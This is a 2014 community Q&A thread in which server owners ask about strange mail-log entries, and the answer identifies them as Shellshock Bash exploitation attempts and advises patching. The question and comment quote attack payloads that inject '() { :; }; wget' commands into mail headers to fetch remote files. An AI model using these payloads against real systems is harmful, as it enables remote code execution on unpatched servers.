Odd mail hack attempt - can mail pull a wget?

Posted October 21, 2014 2.8k views

My mail log for “nobody@[]” shows this for every field - “To:”, “Date:” - all fields. It is from a Chinese IP address. The IP address in the wget is a DigitalOcean address, and the second IP is my server. It appears to be a dead link at this point.

Subject:() { :; };wget[my-ip-address]

Any ideas? I’m lost on the ’ { :; }; ’ - is there a mail function that will execute the wget?

1 comment
  • I have the same question. I get bounce backs for undeliverable email when it hits my mail server and one of the emails looked like this. What vulnerability is this person trying to exploit?

    From () { :; }; wget -O /tmp/dcback
    Subject:() { :; }; wget -O /tmp/dcback
    To () { :; }; wget -O /tmp/dcback
    CC () { :; }; wget -O /tmp/dcback

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

Submit an Answer
1 answer

That looks like someone trying to exploit the Shellshock vulnerability on your droplet. Your droplet might be vulnerable if it’s running an older version of Bash. Take a look at How to Protect your Server Against the Shellshock Bash Vulnerability | DigitalOcean and make sure that your server is up to date, then you should have nothing to worry about :)

Can you please send an email to with a bit more details and a snippet of your mail log (excluding unrelated emails)? Thanks!

by Mitchell Anicas
On September 24, 2014, a GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code given certain conditions, by passing strings of code following environment variable...